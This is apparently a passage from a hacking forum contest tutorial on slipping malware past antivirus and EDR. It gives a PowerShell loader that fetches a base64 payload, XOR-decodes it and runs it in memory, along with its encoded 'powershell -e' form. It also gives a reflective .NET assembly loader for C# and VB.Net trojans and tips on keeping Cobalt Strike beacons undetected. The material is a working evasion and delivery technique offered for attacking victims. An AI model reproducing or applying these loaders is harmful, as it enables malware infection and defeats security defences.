[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('$w=new-object System.Net.Webclient;$bs=$w.DownloadString("http://127.0.0.1/1/bs64.bs64");[Byte[]] $x=[Convert]::FromBase64String($bs.Replace("---","y").Replace("!","W").Replace("@","A").Replace("*","x"));for($i=0;$i -lt $x.Count;$i++){$x[$i]=$x[$i] -bxor [B]NUM[/B]};iex([System.Text.Encoding]::Ascii.GetString($x))'))now take the output and remove any new lines and execute it
Код: Скопировать в буфер обмена
powershell -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvADEAMgA3AC4AMAAuADAALgAxAC8AMQAvAGIAcwA2ADQALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAtAC0ALQAiACwAIgB5ACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACEAIgAsACIAVwAiACkALgBSAGUAcABsAGEAYwBlACgAIgBAACIALAAiAEEAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAKgAiACwAIgB4ACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACQAeABbACQAaQBdACAALQBiAHgAbwByACAATgBVAE0AfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBzAGMAaQBpAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHgAKQApAA==you can hide the windows as well using the -w arg.
We can use the same technique with c#/VB.Net malwares and Trojans. However, there are somethings to understand:
1. Remove the feature of PE Injection, or browser injection to avoid EDRs detection.
2. Remove add reg key cause it will detect such activity.
Then get the bytes of the file with System.IO.File.ReadAllBytes() -> encode it bs64 -> create a url for it
the powershell loader will be something like this
Код: Скопировать в буфер обмена
$w=New-Object System.Net.WebClient;$bs=$w.DownloadString(\"http://127.0.0.1/cSharp.txt\");[byte[]]$b=[Convert]::FromBase64String($bs);$asm=[Reflection.Assembly]::Load($b);$asm.EntryPoint.Invoke($null,$null);You can modify the powershell loading command and encode it as well like we did with the previous example, I'm not going to repeat the same moves. and have fun.
As you can see antiviruses are a peace of shit and there are looooooots of way to bypass them and their techniques in detection, maybe in the future I will explain more stuff and private things and loaders like the loader that has been used in bazarloader and the technique that Revil Randomware has been using to bypass the detection and many cool stuff.
What more ?
when I decoded cobalt strike powershell beacon I noticed that I depends on calling the functions that I talked about in the Bypassing EDR section manually and at runtime, which means that when you encrypt the powershell beacon it should bypass the edr of almost every antivirus that relays on such technique. BUT, Cobalt strike beacon decryption key has been exposed and I don't recommand you to use the same keys, which means that even if you bypass the static and edr the stager will be detected, as will as the communication between the victim and the C2 team server will be detected, in return the beacon will be detected.
So how can we solve such problem? There are many ways but I will give you three tips which will really help you while encryption
First, use your own encryption keys while using cobalt strike, don't use the default keys.
Second, always try to use stageless payloads, so you can avoid detection while receiving the whole payload in chuncks
Third, try to use HTTPs beacon when possible with a custom TLS ssl cert. You can use metasploit auxiliary/gather/impersonate_ssl
I think that's it for today.
I didn't want to make it a long tutorial, but I have seen some members complaining that the tutorial is not long enough, so I asked the admin to grant me some privileges to be able to update the content.
In the end, I want to thank the admin and the sponsor for their effort and no matter what happened to the BTC I am really grateful for the chance to join the contest.